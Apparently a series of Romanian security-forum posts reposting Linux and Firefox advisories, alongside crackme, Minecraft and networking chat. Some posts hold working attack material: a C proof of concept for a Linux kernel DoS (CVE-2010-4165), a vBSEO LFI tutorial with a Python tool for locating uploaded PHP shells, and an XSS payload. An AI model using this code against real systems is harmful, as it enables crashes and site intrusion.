Flubber

Asa ceva nu ajuta cu nimic, tot ce trebuie dat sunt indicii pentru newbies, rezolvarile directe nu te aduc nicaieri si nu inveti nimic din ele, eventual te consulti cu rezolvarile postate pe internet dupa ce ai rezolvat misiunea personal (asa inveti ceva nou, recapitulezi sau poate vezi tehnici noi). Crede-ma, am procedat la fel (in 40% din misiuni) si nu am invatat nimic (aproape).

Zero Day Initiative despre care am postat pe forum, dar aparent nu mai este thread-ul. ZDI-11-103: Mozilla Firefox JSON.stringify Dangling Pointer Remote Code Execution Vulnerability ZDI-11-103: Mozilla Firefox JSON.stringify Dangling Pointer Remote Code Execution Vulnerability [URL="http://www.zerodayinitiative.com/advisories/ZDI-11-103"]Zero Day Initiative[/URL] March 2, 2011 -- CVE ID: CVE-2011-0055 -- CVSS: 9, (AV:N/AC:L/Au:N/C:P/I:P/A:C) -- Affected Vendors: Mozilla -- Affected Products: Mozilla Firefox -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 10843. For further product information on the TippingPoint IPS, visit: [URL="http://www.tippingpoint.com/"]http://www.tippingpoint.com[/URL] [B] -- Vulnerability Details:[/B] This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Firefox. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within js3250.dll. In the JSON.stringify() call chain js_HasOwnProperty() is called with an invalid pointer. The pointer becomes invalid due to being unrooted and garbage collection occurring. Dereferecing of this pointer allows a remote attacker to execute arbitrary code in the context of the user running the browser. -- Vendor Response: Mozilla has issued an update to correct this vulnerability. More details can be found at: [URL="http://www.mozilla.org/security/announce/2011/mfsa2011-03.html"]MFSA 2011-03: Use-after-free error in JSON.stringify[/URL] -- Disclosure Timeline: 2010-12-01 - Vulnerability reported to vendor 2011-03-02 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * regenrecht Sursa: Full Disclosure: ZDI-11-103: Mozilla Firefox JSON.stringify Dangling Pointer Remote Code Execution Vulnerability

Felicitari! Multumiri! :sadface:

Deja s-a facut upgrade-ul la 2.6.32-29. Cine are Ubuntu, update && upgrade. [uSN-1080-1] Linux kernel vulnerabilities (Ubuntu 10.04 LTS) Details follow: Thomas Pollet discovered that the RDS network protocol did not check certain iovec buffers. A local attacker could exploit this to crash the system or possibly execute arbitrary code as the root user. (CVE-2010-3865) Vasiliy Kulikov discovered that the Linux kernel X.25 implementation did not correctly clear kernel memory. A local attacker could exploit this to read kernel stack memory, leading to a loss of privacy. (CVE-2010-3875) Vasiliy Kulikov discovered that the Linux kernel sockets implementation did not properly initialize certain structures. A local attacker could exploit this to read kernel stack memory, leading to a loss of privacy. (CVE-2010-3876) Vasiliy Kulikov discovered that the TIPC interface did not correctly initialize certain structures. A local attacker could exploit this to read kernel stack memory, leading to a loss of privacy. (CVE-2010-3877) Nelson Elhage discovered that the Linux kernel IPv4 implementation did not properly audit certain bytecodes in netlink messages. A local attacker could exploit this to cause the kernel to hang, leading to a denial of service. (CVE-2010-3880) It was discovered that multithreaded exec did not handle CPU timers correctly. A local attacker could exploit this to crash the system, leading to a denial of service. (CVE-2010-4248) Krishna Gudipati discovered that the bfa adapter driver did not correctly initialize certain structures. A local attacker could read files in /sys to crash the system, leading to a denial of service. (CVE-2010-4343) Tavis Ormandy discovered that the install_special_mapping function could bypass the mmap_min_addr restriction. A local attacker could exploit this to mmap 4096 bytes below the mmap_min_addr area, possibly improving the chances of performing NULL pointer dereference attacks. (CVE-2010-4346) It was discovered that the ICMP stack did not correctly handle certain unreachable messages. If a remote attacker were able to acquire a socket lock, they could send specially crafted traffic that would crash the system, leading to a denial of service. (CVE-2010-4526) Dan Rosenberg discovered that the OSS subsystem did not handle name termination correctly. A local attacker could exploit this crash the system or gain root privileges. (CVE-2010-4527) Dan Carpenter discovered that the Infiniband driver did not correctly handle certain requests. A local user could exploit this to crash the system or potentially gain root privileges. (CVE-2010-4649, CVE-2011-1044)[uSN-1081-1] Linux kernel vulnerabilities (Ubuntu 10.10) ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. If you use linux-restricted-modules, you have to update that package as well to get modules which work with the new kernel version. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-server, linux-powerpc), a standard system upgrade will automatically perform this as well. Details follow: It was discovered that KVM did not correctly initialize certain CPU registers. A local attacker could exploit this to crash the system, leading to a denial of service. (CVE-2010-3698) Thomas Pollet discovered that the RDS network protocol did not check certain iovec buffers. A local attacker could exploit this to crash the system or possibly execute arbitrary code as the root user. (CVE-2010-3865) Vasiliy Kulikov discovered that the Linux kernel X.25 implementation did not correctly clear kernel memory. A local attacker could exploit this to read kernel stack memory, leading to a loss of privacy. (CVE-2010-3875) Vasiliy Kulikov discovered that the Linux kernel sockets implementation did not properly initialize certain structures. A local attacker could exploit this to read kernel stack memory, leading to a loss of privacy. (CVE-2010-3876) Vasiliy Kulikov discovered that the TIPC interface did not correctly initialize certain structures. A local attacker could exploit this to read kernel stack memory, leading to a loss of privacy. (CVE-2010-3877) Nelson Elhage discovered that the Linux kernel IPv4 implementation did not properly audit certain bytecodes in netlink messages. A local attacker could exploit this to cause the kernel to hang, leading to a denial of service. (CVE-2010-3880) Dan Rosenberg discovered that the ivtv V4L driver did not correctly initialize certian structures. A local attacker could exploit this to read kernel stack memory, leading to a loss of privacy. (CVE-2010-4079) Dan Rosenberg discovered that the semctl syscall did not correctly clear kernel memory. A local attacker could exploit this to read kernel stack memory, leading to a loss of privacy. (CVE-2010-4083) It was discovered that multithreaded exec did not handle CPU timers correctly. A local attacker could exploit this to crash the system, leading to a denial of service. (CVE-2010-4248) Nelson Elhage discovered that Econet did not correctly handle AUN packets over UDP. A local attacker could send specially crafted traffic to crash the system, leading to a denial of service. (CVE-2010-4342) Tavis Ormandy discovered that the install_special_mapping function could bypass the mmap_min_addr restriction. A local attacker could exploit this to mmap 4096 bytes below the mmap_min_addr area, possibly improving the chances of performing NULL pointer dereference attacks. (CVE-2010-4346) Dan Rosenberg discovered that the OSS subsystem did not handle name termination correctly. A local attacker could exploit this crash the system or gain root privileges. (CVE-2010-4527) Dan Carpenter discovered that the Infiniband driver did not correctly handle certain requests. A local user could exploit this to crash the system or potentially gain root privileges. (CVE-2010-4649, CVE-2011-1044) Cat despre Linux Kernel <= 2.6.37: /* Linux Kernel <= 2.6.37 local kernel DoS (CVE-2010-4165) * ======================================================= * A divide by 0 error occurs in tcp_select_initial_window * when processing user supplied TCP_MAXSEG facilitating a * local denial-of-service condition (kernel oops!) in all * Linux Kernel 2.6.x branch (2.6.37 & below). This issue * can be triggered easily with a call to setsockopt() on * a listening network socket and then establishing a TCP * connection to the awaiting socket. * * -- prdelka * */ #include <stdio.h> #include <stdlib.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netinet/tcp.h> int main() { int optval, optlen, ret, sd, sd2, pid; char *host = "localhost"; struct sockaddr_in locAddr; struct sockaddr_in servAddr; struct sockaddr_in dstAddr; printf("[ Linux Kernel tcp_select_initial_window divide by 0 DoS\n"); sd = socket(AF_INET, SOCK_STREAM, 0); memset(&servAddr,0,sizeof(servAddr)); memset(&dstAddr,0,sizeof(dstAddr)); servAddr.sin_family = AF_INET; servAddr.sin_port = htons(60000); servAddr.sin_addr.s_addr = INADDR_ANY; dstAddr.sin_family = AF_INET; inet_aton("127.0.0.1", &dstAddr.sin_addr); dstAddr.sin_port = htons(60000); if((bind(sd,(struct sockaddr *)&servAddr,sizeof(struct sockaddr))) == -1){ printf("[ Cannot bind listener service\n"); exit(-1); } listen(sd,4); optval = 12; ret = setsockopt(sd, IPPROTO_TCP, TCP_MAXSEG, &optval, sizeof(optval)); if(ret==0) { printf("[ System is not patched against CVE-2010-4165\n[ Goodnight, sweet prince.\n"); int sin_size = sizeof(struct sockaddr_in); switch(pid = fork()) { case 0: sd = accept(sd,(struct sockaddr *)&locAddr,&sin_size); sleep(3); default: sd2 = socket(AF_INET, SOCK_STREAM, 0); connect(sd2, (struct sockaddr *)&dstAddr, sizeof(dstAddr)); sleep(3); } } printf("[ System is patched, no dreams for this prince\n"); return 0; } Surse (in ordine): 1] Full Disclosure: [uSN-1080-1] Linux kernel vulnerabilities 2] Full Disclosure: [uSN-1081-1] Linux kernel vulnerabilities 3] Linux Kernel <= 2.6.37 Local Kernel Denial of Service

Subscriu. Deasemenea, la 6 dimineata imi storceam creierii si tot ce am putut scoate a fost: CrackMe-rstcenter#PictureBox1.ImagePictureBox1Form2OStraduieste-te mai mult , pentru ca ...Form3Ai reusit !#CrackMe.Resou?rces EAX=0B71B600 Stack SS:[0012E4C0]=01692678, (ASCII "îþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþîþEAX=0B71B600 Niste notite idioate, dar am observat ceva si tot incercasem niste chestii aiurea: CrackMe[B]-rstcenter[/B] mai exact -rstcenter . Daca incepeam cu trial si error (daatdraq-rstcenter // gigiparleala-rstcenter etc) poate reuseam ceva. Multumiri pentru crackme, cei drept, trebuia o analiza mai in detaliu a executabilului si poate imi dadeam seama ca a fost facut in .NET. P.S.: Notitele au fost realizate in urma introducerii (bleah, suna aiurea) a executabilului in notepad (da, notepad ftw) si in hex editor -- a se vedea 'Form3 Ai reusit!', speram la un bypass catre Form3.

Ubuntu Security Notice. Este vorba de Ubuntu 6.06 LTS, destul de vechi, dar daca foloseste cineva (motiv: sistem cu performanta scazuta?), se recomanda un update & upgrade. A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: linux-image-2.6.15-55-386 2.6.15-55.93 linux-image-2.6.15-55-686 2.6.15-55.93 linux-image-2.6.15-55-amd64-generic 2.6.15-55.93 linux-image-2.6.15-55-amd64-k8 2.6.15-55.93 linux-image-2.6.15-55-amd64-server 2.6.15-55.93 linux-image-2.6.15-55-amd64-xeon 2.6.15-55.93 linux-image-2.6.15-55-hppa32 2.6.15-55.93 linux-image-2.6.15-55-hppa32-smp 2.6.15-55.93 linux-image-2.6.15-55-hppa64 2.6.15-55.93 linux-image-2.6.15-55-hppa64-smp 2.6.15-55.93 linux-image-2.6.15-55-itanium 2.6.15-55.93 linux-image-2.6.15-55-itanium-smp 2.6.15-55.93 linux-image-2.6.15-55-k7 2.6.15-55.93 linux-image-2.6.15-55-mckinley 2.6.15-55.93 linux-image-2.6.15-55-mckinley-smp 2.6.15-55.93 linux-image-2.6.15-55-powerpc 2.6.15-55.93 linux-image-2.6.15-55-powerpc-smp 2.6.15-55.93 linux-image-2.6.15-55-powerpc64-smp 2.6.15-55.93 linux-image-2.6.15-55-server 2.6.15-55.93 linux-image-2.6.15-55-server-bigiron 2.6.15-55.93 linux-image-2.6.15-55-sparc64 2.6.15-55.93 linux-image-2.6.15-55-sparc64-smp 2.6.15-55.93 After a standard system update you need to reboot your computer to make all the necessary changes. Details follow: Tavis Ormandy discovered that the Linux kernel did not properly implement exception fixup. A local attacker could exploit this to crash the kernel, leading to a denial of service. (CVE-2010-3086) Dan Rosenberg discovered that the Linux kernel TIPC implementation contained multiple integer signedness errors. A local attacker could exploit this to gain root privileges. (CVE-2010-3859) Dan Rosenberg discovered that the Linux kernel X.25 implementation incorrectly parsed facilities. A remote attacker could exploit this to crash the kernel, leading to a denial of service. (CVE-2010-3873) Vasiliy Kulikov discovered that the Linux kernel X.25 implementation did not correctly clear kernel memory. A local attacker could exploit this to read kernel stack memory, leading to a loss of privacy. (CVE-2010-3875) Vasiliy Kulikov discovered that the Linux kernel sockets implementation did not properly initialize certain structures. A local attacker could exploit this to read kernel stack memory, leading to a loss of privacy. (CVE-2010-3876) Nelson Elhage discovered that the Linux kernel IPv4 implementation did not properly audit certain bytecodes in netlink messages. A local attacker could exploit this to cause the kernel to hang, leading to a denial of service. (CVE-2010-3880) Dan Rosenberg discovered that the SiS video driver did not correctly clear kernel memory. A local attacker could exploit this to read kernel stack memory, leading to a loss of privacy. (CVE-2010-4078) Dan Rosenberg discovered that the RME Hammerfall DSP audio interface driver did not correctly clear kernel memory. A local attacker could exploit this to read kernel stack memory, leading to a loss of privacy. (CVE-2010-4080, CVE-2010-4081) Dan Rosenberg discovered that the semctl syscall did not correctly clear kernel memory. A local attacker could exploit this to read kernel stack memory, leading to a loss of privacy. (CVE-2010-4083) James Bottomley discovered that the ICP vortex storage array controller driver did not validate certain sizes. A local attacker on a 64bit system could exploit this to crash the kernel, leading to a denial of service. (CVE-2010-4157) Dan Rosenberg discovered that the Linux kernel L2TP implementation contained multiple integer signedness errors. A local attacker could exploit this to to crash the kernel, or possibly gain root privileges. (CVE-2010-4160) Via RSS.

Epic. Un video tipic manipularii, American "dream":

Exact! HBGary. Nici eu nu stiam cine dracu o fi si asta, pana ce am citit tot articolul (aproape) primit prin RSS; este epic. Este exact ce au descris membrii old school din scena. Mai tineti minte? Si citez: Ca cei din Anonymous s-au folosit de o vulnerabilitate SQLi in CMS pentru a realiza deface-ul respectiv, nu este o scuza pentru un 'super expert in securitate' ce lucreaza la o firma care are contracte cu FBI,NSA etc. Partea si mai interesanta este cand practica social engineering pe unul din angajatii respectivi, care a muscat momeala,si a DEZACTIVAT FIREWALL-UL permitand accesul SSH DE ORIUNDE. Fail.Din acest articol: Sursa: Full Disclosure: What the f*** is going on? (destul de amuzant cum se enerveaza cei de genul)Articol complet (3 pagini): Anonymous speaks: the inside story of the HBGary hack // LE: Am uitat sa mentionez ca mega expertul in securitate taxa sume imense de bani pentru niste simple scan-uri cu NMAP!

Thread din 2008! Nu inviati mortii fiindca nu, nu inseamna ca vine Iisus pe pamant, ci ca se vor transforma in zombie!

Stii vorba aia 'Râde ciob de oal? spart?.'? Cam pe asta o aplici tu acum. Cu thread-ul asta de cacat ce vrea sa fie un 'prank' elaborat, mi-ai mai irosit inca 2 minute din viata (a trebuit sa scriu si postul asta, nu?). Cat despre a cere sfaturi, nu e nimic gresit in asta, poate doresti mai multe opinii de pretitundeni pentru a ajunge la un rezultat final, ti-ai pus neuronul salbatic si singurel la lucru sa iei concluzia asta in calcul? Nu prea! Bad, bad, bad!

Kinda old. 3rd August 2010 Some time ago, an LFI vulnerability within vBSEO was discovered, which allowed an attacker to include locally hosted files. The challenge, when confronted with an LFI vulnerability, is to leverage it into executing arbitrary code of our choosing. Many vBulletin installations are using this addon to improve their SEO drastically, however many of them are not fully patched which is good for us, but very bad for those that host a vulnerable web application. vBulletin – Not So Secure Anymore 3rd August 2010 - by MaXe Tags: Exploit, WebApps Some time ago, an LFI vulnerability within vBSEO was discovered, which allowed an attacker to include locally hosted files. The challenge, when confronted with an LFI vulnerability, is to leverage it into executing arbitrary code of our choosing. Many vBulletin installations are using this addon to improve their SEO drastically, however many of them are not fully patched which is good for us, but very bad for those that host a vulnerable web application. In many cases, it is not piece of cake to exploit LFI, aka Local File Inclusion, vulnerabilities due to the fact it may not be easy to upload content to the target server. In some scenarios, it is possible to inject PHP code into access logs and in others, it is possible to include binary MySQL files. It should be noted though, that it is usually impossible to always know where these files are stored. Of course, we can guess where these files are stored, but we may still not be sure how the server is configured and if this approach will work. Reconnaissance First, we need to determine whether our target is vulnerable or not. This can be done by requesting to include a local script in the following manner: http://our-target.tld/vbseo.php?vbseoembedd=1&vbseourl=./clientscript/ieprompt.html vBulletin – Not So Secure Anymore 3rd August 2010 - by MaXe Tags: Exploit, WebApps Some time ago, an LFI vulnerability within vBSEO was discovered, which allowed an attacker to include locally hosted files. The challenge, when confronted with an LFI vulnerability, is to leverage it into executing arbitrary code of our choosing. Many vBulletin installations are using this addon to improve their SEO drastically, however many of them are not fully patched which is good for us, but very bad for those that host a vulnerable web application. In many cases, it is not piece of cake to exploit LFI, aka Local File Inclusion, vulnerabilities due to the fact it may not be easy to upload content to the target server. In some scenarios, it is possible to inject PHP code into access logs and in others, it is possible to include binary MySQL files. It should be noted though, that it is usually impossible to always know where these files are stored. Of course, we can guess where these files are stored, but we may still not be sure how the server is configured and if this approach will work. Reconnaissance First, we need to determine whether our target is vulnerable or not. This can be done by requesting to include a local script in the following manner: http://our-target.tld/vbseo.php?vbseoembedd=1&vbseourl=./clientscript/ieprompt.html Please note that some installations may appear to be vulnerable even though they’re not. From our basic check above, we would like to test whether our target really is vulnerable to Local File Inclusions. We do this by creating a small txt file with ‘phpinfo()’ in it which we will upload to our target via the attachment manager. Some vBulletin installations store attachments locally, which can be abused in this case to include a shell or similar malicious code IF we know the physical location of our file and if there’s a vulnerability which allows us to do that. Exploitation In order to find the physical location of our uploaded file we need to find the attachment directory and scan through the subdirectories. I’ve created a small tool for this task, which is far from complete but it does work on some hosts. You can get the basic version is as follows: #!/usr/bin/python # ______ __ __ __ __ ______ # /\__ _\ /\ \__ /\ \/\ \ /'__`\/\__ _\ # \/_/\ \/ ___\ \ ,_\ __ _ __\ \ `\\ \/\ \/\ \/_/\ \/ # \ \ \ /' _ `\ \ \/ /'__`\/\`'__\ \ , ` \ \ \ \ \ \ \ \ # \_\ \__/\ \/\ \ \ \_/\ __/\ \ \/ \ \ \`\ \ \ \_\ \ \ \ \ # /\_____\ \_\ \_\ \__\ \____\\ \_\ \ \_\ \_\ \____/ \ \_\ # \/_____/\/_/\/_/\/__/\/____/ \/_/ \/_/\/_/\/___/ \/_/ # -------------------------------------------------------- # Title: vBSEO LFI Assistant Tool # Author: MaXe # Site: http://www.intern0t.net # # Description: 1) Checks whether the vBSEO installation # is patched or not. 2) Attempts to find # the physical location of an uploaded # attachment phile. (PHP Shell) # # Version: 2.1.4 - Reversed Algorithm - Basic Version # # License: -- Attribution-ShareAlike 3.0 Unported -- # http://creativecommons.org/licenses/by-sa/3.0/ # # Notes: The basic version does not contain multi- # threading nor is it able to search through # multiple sub directories which the advanced # version will be able to. # Please note, that this tool does not work on # all types of hosts and you should therefore # modify this script to your own needs. # # Disclaimer: This tool is meant for ethical purposes only. # Import the appropriate libraries. import os import re import httplib import sys # Clear the screen in a sufficient way. if(os.name) == "posix": os.system("clear") elif(os.name) == "nt": os.system("cls") else: print "[!] Cannot clear screen automatically.\n" print "File Finder by MaXe from InterN0T.net\n\n" # Get user-input and define global variables. target = raw_input("Enter a domain to scan: ") file_match = raw_input("Enter a keyword to look for: ") main_dir = ["attach","attachment","attachments","download"] poss_main_dir = [] sub_dir = [] # Strip away http and https from the target variable. striptarget = re.compile('(http://|https://)') newtarget = striptarget.sub('', target) # Perform a simple LFI to check whether the target is vulnerable or not. conn = httplib.HTTPConnection(newtarget, 80) print " [*] Checking if site appears to be vulnerable." conn.request("GET", "/vbseo.php?vbseoembedd=1&vbseourl=./clientscript/ieprompt.html") resp = conn.getresponse() # If the response code is 200 OK, check if the file really was included. if resp.status == 200: print "[+] Site is responding, this is good." if re.search("(Enter text...)", resp.read()): print ">> The site appears to be vulnerable!" else: print "[!] The site appears to be patched. (unknown error)" elif resp.status == 404: print "[!] The site appears to be patched. (404)" # Search for attachment directories for value in main_dir[0:]: conn = httplib.HTTPConnection(newtarget, 80) print " [*] Trying: http://%s/%s/" % (newtarget,value) conn.request("HEAD", "/%s/" % value) resp = conn.getresponse() # If the response code is 403 (Forbidden), set a new variable and continue. if resp.status == 403: print "[+] Directory found: /%s/" % value if poss_main_dir == []: poss_main_dir = ["%s" % value] else: poss_main_dir += ["%s" % value] conn.close() if poss_main_dir == []: print "[!] No directories were found, exiting." sys.exit() # Search for possible sub directories for value in poss_main_dir: i = 0 print " [*] Trying subdirs within: http://%s/%s/" % (newtarget,value) while i <= 9: conn = httplib.HTTPConnection(newtarget, 80) conn.request("HEAD", "/%s/%s/" % (value,i)) resp = conn.getresponse() if resp.status == 403: print "[+] Sub Directory found: /%s/%s/" % (value,i) found = "%s/%s" % (value,i) if sub_dir == []: sub_dir = ["%s" % found] else: sub_dir += ["%s" % found] i=i+1 conn.close() if sub_dir == []: print "[!] No sub directories were found, exiting." sys.exit() # Search all the sub directories found for our phile for value in sub_dir[0:]: i = 99 print " [*] Trying to find our file within: /%s/" % value while i >= 0: conn = httplib.HTTPConnection(newtarget, 80) conn.request("GET", "/%s/%s.attach" % (value,i)) resp = conn.getresponse() if resp.status == 200: print "[+] File found, does it match our keyword? >>%s" % file_match if re.search("(%s)" % file_match, resp.read()): print ">> File contains our keyword!" print "Part URL: /%s/%s.attach" % (value,i) print "Full URL: http://" + newtarget + "/%s/%s.attach \n" % (value,i) sys.exit(0) i=i-1 conn.close() # Don't forget, that this script can be used for more than one thing. Sursa: vBulletin – Not So Secure Anymore Autor: MaXe

Ai PM. Thanks 4 the challenge.

Nu s-a ales praful deloc, cine vrea sa invete ASM si RE trebuie sa stie engleza (ca vrea, ca nu vrea). Acum, in opinia mea pentru incepatori (ca si mine) era bine daca explica cineva (pe intelesul tuturor) cum functioneaza CPU (incluzand registrii, cache-urile level 1 si level 2, arithmetic logic unit, cum cauta in memoria ram prin data bus, cum functioneaza mai exact stack-ul si asa mai departe), fiindca sunt notiuni de baza, si trebuie sa le intelegi din moment ce CPU-ul iti returneaza valorile vazute in debugger, prin ASM intelegand toate 'comenzile' gen JMP,CMP,SUB,ADD etc. Acum nu stiu pe cati ar interesa asa ceva, fiindca o sa se spuna 'da, dar mi se rupe mie ca CPU-ul are ALU si ca face 5.000.000.000.000.000.000 (not sure) calcule pe secunda doar ca sa imi arate mie pe ecran "X" la bara de sus a ferestrei cu pr0n. Cum am mai spus, depinde de fiecare, daca doreste sa aiba si cunostinte in legatura cu ce se intampla 'under the hood'. // LE: un alt video ce arata cum se face un crack pentru jocul (destul de vechi -- data lansarii: 1999; lul) Caesar 3 dar arata acelasi principiu pe care l-a folosit si phantomas90

"Well, at least "><script>alert(/XSS/)</script> works great: http://img6.imagebanana.com/img/4tyst18d/one.png http://img6.imagebanana.com/img/wh9zwmc6/two.png Thx to Friedrich Hausberger for his mail to FD ck" Sursa: Full Disclosure: [Google Chrome Browser] Google Mail Checker Plus: JavaScript Code Execution

Sa traiesti o mie de ani!

Foarte interesant. Multumesc. On topic: prima data si eu am crezut ca vorbeste de subconstient si cum 'dicteaza' acesta pe fiecare in functie de caracteristicile lui, dar cand am citit ca fizic nu poate fi gasit, mi-a rupt inima in doi. Drept care, ceea ce nu poti vedea, dar este prezent la cineva, asa cum s-a mentionat este temperamentul, caracterul, personalitatea, toate acestea influentate de societatea si mediul in care traieste. Daca stai sa te gandesti bine, si s-ar putea sa spun o prostie (ce daca), chiar si temperamentul, caracteristicile si asa mai departe sunt rezultatul unor retele neuronale (in continua "schimbare" -- de-aia cateodata ne "schimbam" pentru o perioada de timp, atunci cand (daca ati observat) ne place la cineva ceva anume si tindem sa copiem la caracterul nostru (asa devin unii oameni snobi)), cum reactionezi tu la anumite situatii (iubire, ura si asa mai departe) este rezultatul unor substante eliberate de catre creierul tau prin intermediul inimii (asa se cam raspandeste in tot sistemul). Cum am spus, s-ar putea sa vorbesc aiurea, chiar rog sa ma corecteze cineva sau sa aduca obiectii (cu argumente), mi-a starnit rau curiozitatea profesorul tau.

http://www.sendspace.com/file/v74wwm Pentru client (game) un script bash simplu: #!/bin/bash echo "Starting client." java -jar MinecraftSP.jar ^ ai nevoie de java instalat sudo apt-get update sudo apt-get install sun-java6-jre sun-java6-plugin Pentru server: #!/bin/bash echo "Starting server." java -Xmx1024M -Xms1024M -jar minecraft_server.jar nogui Prima oara il rulezi apoi scrii "stop" dupa ce a terminat de generat mapa si incarcat resursele. Apoi in folder o ti se faca niste fisiere, printre care "server.properties" Editeaza-l: #Minecraft server properties #Wed Feb 16 23:49:36 EET 2011 level-name=world hellworld=false spawn-monsters=true online-mode=false spawn-animals=true max-players=20 server-ip=IP-UL SERVER-ULUI pvp=false server-port=25565 Vezi care sunt diferentele, nu mai retin cum era originalul. Have fun! // Server-ul este doar daca vrei sa mai joci cu cineva (in multiplayer), doar cu client-ul poti juca si singleplayer.

Este un fel de ... Diablo as putea spune (e mult zis dar intelegi ideea), poti distruge copaci sa faci rost de lemne, cu lemne si cu piatra iti faci sabie (a.k.a. CRAFTING), si asa mai departe, pe timp de zi iei aceste decizii fiindca atunci cand se lasa noaptea ies zombie la omorat (la propriu). Am jucat o ora, am avut 2 crash-uri, il rulez pe Ubuntu 10.04.2 LTS, a treia oara am inchis Pidgin, Akregator etc. si nu am mai avut probleme. Simpatic jocul, in seara asta il rup iar, dar totusi, sa faci intr-un asemenea joc un CPU intreg (cu ALU) si separat memoria (RAM) fara sa o incluzi pe cea rezervata registrilor? Talentat baiatul ala, le stie ca pe propria-i palma xD.

... cuvinte? Nu sunt. 1. 2. 3. 4. + + http://www.youtube.com/watch?v=uIhdP9ylRxEI mean... WHAT THE 0xFFFFFFFF?

2 urate. 1. 2. Update & packet upgrade: sudo apt-get update sudo apt-get upgrade sudo apt-get clean sudo apt-get autoclean sudo apt-get autoremove sudo shutdown -r 0 -- restart ^ sau: sudo reboot Primite via RSS 1] http://seclists.org/fulldisclosure/2011/Feb/313 2] http://seclists.org/fulldisclosure/2011/Feb/329

http://inregistrari.antena3.ro/view-In_gura_presei_cu_Mircea_Badea-5.html Mai exact: http://inregistrari.antena3.ro/view-15_Feb-2011-In_gura_presei_cu_Mircea_Badea-5.html De la minutul 37:08. Doza de ras.

Foarte bun experimentul, felicitari. Sper sa fi invatat cate ceva fiecare, totusi e trist cum vezi lumea ca scrie comment-uri pe diferite blog-uri: Si altele de genul,irosindu-si timpul fara sa invete ceva cu adevarat, ceva ce le-ar folosii si le-ar tine pasiunea (presupunand ca au una; de-aia si stau acolo, sa o satisfaca) in flacari.

La cat mai multe. Lena e awesome!

Mask: 255.255.255.0 Nu 255.255.252.0! Lo-ul lasa-l pe default cum este (loopback), modifica doar eth0 si incearca din nou. Cat despre modem-ul UPC, ai vreo foaie anume cu IP-uri (statice, nu se schimba la restart) si netmask/dns servers, sau ai user si parola ca la RDS, ti se aloca IP dinamic (dupa reconectare ti se alocheaza un alt IP)? Fiindca din poza, pari a avea unul static.

Prin comanda "sudo su" iar apoi scrii parola.